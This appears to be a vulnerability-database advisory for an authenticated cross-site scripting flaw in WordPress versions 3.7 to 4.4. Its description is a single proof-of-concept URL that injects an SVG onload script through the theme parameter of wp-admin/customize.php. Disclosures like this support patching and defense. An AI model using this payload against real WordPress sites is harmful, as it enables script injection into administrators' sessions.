WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS)

2016-01-06T00:00:00
ID WPEX-ID:09329E59-1871-4EB7-B6EA-FD187CD8DB23
Type wpexploit
Reporter ethicalhack3r
Modified 2020-09-22T07:14:44

Description

                                        
                                            http://www.example.com/wp-admin/customize.php?theme=<svg onload=alert(1)> (source: https://twitter.com/brutelogic/status/685105483397619713)